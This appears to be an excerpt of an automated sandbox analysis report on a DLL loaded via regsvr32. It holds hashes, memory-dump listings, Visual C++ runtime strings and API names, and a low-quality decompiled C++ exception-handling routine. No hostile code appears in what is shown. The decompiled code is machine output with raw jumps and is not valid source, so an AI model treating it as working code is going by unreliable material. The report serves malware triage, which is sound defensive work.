                                                                    • Instruction ID: c15f1aaae4e4e13c906589d5588e8395ab5dda45948680e718f465f07a8a5b6e
                                                                    • Opcode Fuzzy Hash: c574afae7ba18edac7d834e0abd82c8c7458f2e927091ead9319fe9aa7316d5f
                                                                    • Instruction Fuzzy Hash: EC41C4B190038E8FDF48CF64C84A4DE7BB0FB58358F104619E86AA7250D3B8D665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                                    • Instruction ID: c896a4b3abc40741a1500648b31ed7fd3e584cfdc10005e9d212c87c64feccae
                                                                    • Opcode Fuzzy Hash: 4afcbbeb8beafd70164a818e9f41371ad943d797e3468922fcea1c7c9f2e7631
                                                                    • Instruction Fuzzy Hash: 2541C1B181035E8BDB48CFA8D48A5DE7FB0FB68398F204619E855A6214D3B496A4CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                                    • Instruction ID: db142853bc0ceb5379a440845187b42230294cb0dc3411c083ed269e5703ce5c
                                                                    • Opcode Fuzzy Hash: 6edc2e1e82c131bcdf0495892124b6f46e3b6b242b9e6d8eacab558a4eb6cfc8
                                                                    • Instruction Fuzzy Hash: E831AFB090034E8FCB48CF68C4865DE7FB0FB58398F114219E85AA6210D3B496A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                                    • Instruction ID: 032a8ed253072f6fd1b05e82d0325949fdf78283cb4c6b9cd1929990fdaa7975
                                                                    • Opcode Fuzzy Hash: 6c455d63c0866516b303eef6870e820fc06907d5cf01b5e138b1643b6a977dfc
                                                                    • Instruction Fuzzy Hash: F93195B050078A8BCF48DF68C85A5AE3BB1FB48308B404A2DFD269A350D7B49664CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                                    • Instruction ID: 9b1437c5de0cc84ebb9c914bb54d42d7cbbf0eefc466e3cb3beb54b329be6ed5
                                                                    • Opcode Fuzzy Hash: 91382f82a540e9ea2bbfb40e05a393f87671ab464d1f075959bb3f3378a52dce
                                                                    • Instruction Fuzzy Hash: E631D5B190034E8FCF48DF68C48A4DE7FB1FB68398F100619E816A6250D3B896A4CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                                    • Instruction ID: e5161e45e20286f18a7c233b2d95f7c6d50d739ad8bc374cfda940a225cf7d0d
                                                                    • Opcode Fuzzy Hash: 76bccbb128cfcb22620bb2b416fc3ca44309eaef87c6278072ef16f6a50a05e8
                                                                    • Instruction Fuzzy Hash: DD315C305187849BC3999B24C4C925EBEE1FB85399FA0682CF1C3C6264D774C98A8B06
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                                    • Instruction ID: e62117077ddfbae32c834d069a9ab80343e2b26cefae081dcf738b8df2b77597
                                                                    • Opcode Fuzzy Hash: 33d7533839bea32518041b6ca5f29ea3ef2f9d4ceb6278032ee9dcaf63ac5804
                                                                    • Instruction Fuzzy Hash: B22148B56183848BD749DF28D44A41ABBE1FB9C74CF400B6DF4CAAB250D378D649CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                                    • Instruction ID: 503aa3927fff6e4ad3ec536c6aa42fcab205a0bd32951b21a7cd1c91f46ab624
                                                                    • Opcode Fuzzy Hash: 8ecf74b073e9749c9a707f8928f85ed0a2f8ff40eefc5cc2f6539f01074e035d
                                                                    • Instruction Fuzzy Hash: 3F2150B46187848BD748DF28C45641ABBE1FB9C358F804B2DF4CAA7350D7789A05CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                                    • Instruction ID: bec49874bf3906a1a9314e610e6330a75ea1af3aa415f07e7967bd5f7b72e726
                                                                    • Opcode Fuzzy Hash: 9daa26d15846afd04c30d9d8c23f2645a3612f544d511007b76009de9b77635d
                                                                    • Instruction Fuzzy Hash: 61215CB16187848BD748DF28D05941FBBE0BB8D358F405B2DF8CAA6351D7789644CB4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_unlock_wcsftime_l
                                                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                                    • API String ID: 242677333-579931786
                                                                    • Opcode ID: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                    • Instruction ID: 59d0ad1821d2987490fb14e41c4dc7dbbb96a2632b775096c591c8feb24f6032
                                                                    • Opcode Fuzzy Hash: 90fb5dc47a0cb7e52882a682e6518eda47d2e5e2933cc617357387334d7819cd
                                                                    • Instruction Fuzzy Hash: DF321A3190CA8695EBB0CB18EC543EE73A0F784345FA04125D6CD47AA9DB7EE549CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invoke_watson_if_error$FileModuleName
                                                                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                                    • API String ID: 1949418964-1840610800
                                                                    • Opcode ID: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                    • Instruction ID: afa63f492d6c70519d8e627b7e85a2bc97528eb7c2a0a9c735d6d19596090ce3
                                                                    • Opcode Fuzzy Hash: 44b701395b3347ba89d33a25413c6d043cef3cadf6afd38b3a3e0c178ea01b00
                                                                    • Instruction Fuzzy Hash: 90F1D636609BC694E6B0DB54E8483AEB3E4F389780F604125DACD43BB9DB7ED194CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invoke_watson_if_error$_invalid_parameter
                                                                    • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                                    • API String ID: 2356156361-2279852085
                                                                    • Opcode ID: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                    • Instruction ID: 4b7917f2e6131773ed7248c088fbaee50c31bf3d43f4cd1ee6c8c65be3a18826
                                                                    • Opcode Fuzzy Hash: 2e784d19664e5a95b58b990f67b4737f05373876c1930d3c64995b1a0c69d3f2
                                                                    • Instruction Fuzzy Hash: BCC1E77190DBC681EBB48B15E8803EEA3E1F389384F614126E6CD42BB9DB7ED155CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                                    • API String ID: 3320372497-2837547082
                                                                    • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                    • Instruction ID: 0a9042e1a7d7c8a566278db251693fc707392c06de90b0eab8804e289765c981
                                                                    • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                    • Instruction Fuzzy Hash: 4C910E31A1CA8685EBA0DB64E8543BE63E0F384784FA04126D6CD47AB9DF3FE545CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                    • API String ID: 2574300362-564504941
                                                                    • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                    • Instruction ID: 70a6d76ff3d3819b8955004bde04ce45998dc5e92ad36a3a08ed7dd3d00f33af
                                                                    • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                    • Instruction Fuzzy Hash: F051A635A08A8286E7A09B19FC5476E73E4F784B51F609035DACE43A74DF7EE488CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                                    • String ID:
                                                                    • API String ID: 641786319-0
                                                                    • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                    • Instruction ID: 27f88887327b6a70fd6681a1572ed994cc0fbf2c3fc8410d15a0bdfd36c78ba8
                                                                    • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                    • Instruction Fuzzy Hash: 7402F432A0CEC5C1D6A09B15E8903AEB7A0F7857A5F604226E6DD47BE9DF3ED445CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 20%
                                                                    			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                                                    				long long _v24;
                                                                    				long long _v32;
                                                                    				char _v56;
                                                                    				long long _v64;
                                                                    				long long _v72;
                                                                    				char _v80;
                                                                    				void* _v88;
                                                                    				void* _v96;
                                                                    				intOrPtr _v104;
                                                                    				void* _v112;
                                                                    				intOrPtr _v120;
                                                                    				void* _v128;
                                                                    				char _v132;
                                                                    				char _v136;
                                                                    				long long _v144;
                                                                    				signed int _v152;
                                                                    				char _v160;
                                                                    				signed char _v164;
                                                                    				signed int _v168;
                                                                    				char _v176;
                                                                    				char _v184;
                                                                    				long long _v192;
                                                                    				signed char _v200;
                                                                    				long long _v208;
                                                                    				signed int _v216;
                                                                    				signed int _v224;
                                                                    				long long _v232;
                                                                    				void* _t222;
                                                                    				void* _t244;
                                                                    				void* _t295;
                                                                    				long long _t302;
                                                                    				long long _t303;
                                                                    				intOrPtr _t311;
                                                                    				long long _t312;
                                                                    				long long _t321;
                                                                    				intOrPtr _t325;
                                                                    				long long _t329;
                                                                    				long long _t330;
                                                                    				long long _t332;
                                                                    
                                                                    				_t295 = __rax;
                                                                    				_a32 = __r9;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __rdx;
                                                                    				_a8 = __rcx;
                                                                    				_v164 = 0;
                                                                    				_v152 = 0;
                                                                    				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
                                                                    				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
                                                                    				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
                                                                    				r9d = _v168;
                                                                    				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
                                                                    				r9d = _v168;
                                                                    				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                                                    				goto 0xf9d34197;
                                                                    				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
                                                                    				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
                                                                    				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
                                                                    				goto 0xf9d341b6;
                                                                    				_t222 = E000007FE7FEF9D2CF80(_a40);
                                                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
                                                                    				_t302 = _a8;
                                                                    				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
                                                                    				0xf9d24000();
                                                                    				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
                                                                    				goto 0xf9d34862;
                                                                    				0xf9d24000();
                                                                    				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                                                    				_a8 = _t303;
                                                                    				0xf9d24000();
                                                                    				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                                                    				_v164 = 1;
                                                                    				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                                                    				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
                                                                    				goto 0xf9d34295;
                                                                    				E000007FE7FEF9D2CF80(_a8);
                                                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
                                                                    				_t311 = _a8;
                                                                    				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
                                                                    				E000007FE7FEF9D2CF80(_t311);
                                                                    				0xf9d24000();
                                                                    				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
                                                                    				0xf9d24000();
                                                                    				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                                                    				_v144 = _t312;
                                                                    				0xf9d24000();
                                                                    				 *((long long*)(_t312 + 0x108)) = 0;
                                                                    				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
                                                                    				goto 0xf9d34398;
                                                                    				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
                                                                    				E000007FE7FEF9D35AB0(1, _a8);
                                                                    				E000007FE7FEF9D34870( &_v56, "bad exception");
                                                                    				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a180);
                                                                    				goto 0xf9d34398;
                                                                    				E000007FE7FEF9D2CF50(_t312);
                                                                    				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
                                                                    				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
                                                                    				if (_a40[3] <= 0) goto 0xf9d3466c;
                                                                    				_v216 = _a32;
                                                                    				_v224 =  &_v132;
                                                                    				_t321 =  &_v136;
                                                                    				_v232 = _t321;
                                                                    				r9d = _v168;
                                                                    				r8d = _a56;
                                                                    				E000007FE7FEF9D2EA30(_a16, _a40);
                                                                    				_v128 = _t321;
                                                                    				goto 0xf9d3447e;
                                                                    				_v136 = _v136 + 1;
                                                                    				_v128 = _v128 + 0x14;
                                                                    				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
                                                                    				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
                                                                    				_t325 = _v128;
                                                                    				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
                                                                    				goto 0xf9d3445a;
                                                                    				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                                                    				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                                                    				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                                                    				_v120 = _v120 - 1;
                                                                    				_t329 = _v112 + 0x14;
                                                                    				_v112 = _t329;
                                                                    				if (_v120 <= 0) goto 0xf9d34667;
                                                                    				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
                                                                    				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                                                    				_v96 = _t330;
                                                                    				E000007FE7FEF9D2E6A0(_t244, _t330);
                                                                    				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                                                    				goto 0xf9d3457e;
                                                                    				_v104 = _v104 - 1;
                                                                    				_t332 = _v96 + 4;
                                                                    				_v96 = _t332;
                                                                    				if (_v104 <= 0) goto 0xf9d34662;
                                                                    				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
                                                                    				_v88 = _t332 +  *_v96;
                                                                    				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
                                                                    				goto 0xf9d3455a;
                                                                    				_v152 = 1;
                                                                    				_v176 = _a48 & 0x000000ff;
                                                                    				_v184 = _v164 & 0x000000ff;
                                                                    				_v192 = _a64;
                                                                    				_v200 = _a56;
                                                                    				_v208 = _v128;
                                                                    				_v216 = _v88;
                                                                    				_v224 = _v112;
                                                                    				_v232 = _a40;
                                                                    				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                                                    				goto 0xf9d34667;
                                                                    				goto 0xf9d3455a;
                                                                    				goto L1;
                                                                    				goto 0xf9d3445a;
                                                                    				__eax = _v152 & 0x000000ff;
                                                                    				__eflags = _v152 & 0x000000ff;
                                                                    				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
                                                                    				__rax = _a40;
                                                                    				__eax =  *_a40;
                                                                    				__eax =  *_a40 & 0x1fffffff;
                                                                    				__eflags = __eax - 0x19930521;
                                                                    				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
                                                                    				__rax = _a40;
                                                                    				__eflags =  *(__rax + 0x20);
                                                                    				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
                                                                    				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                                    				_a40 = _a40[8];
                                                                    				_v32 = __rax;
                                                                    				goto 0xf9d346cb;
                                                                    				_v32 = 0;
                                                                    				__eflags = _v32;
                                                                    				if (_v32 == 0) goto 0xf9d347d7;
                                                                    				__rax = _a40;
                                                                    				__eflags =  *(__rax + 0x20);
                                                                    				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
                                                                    				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                                    				_a40 = _a40[8];
                                                                    				__rax = __rax + _a40[8];
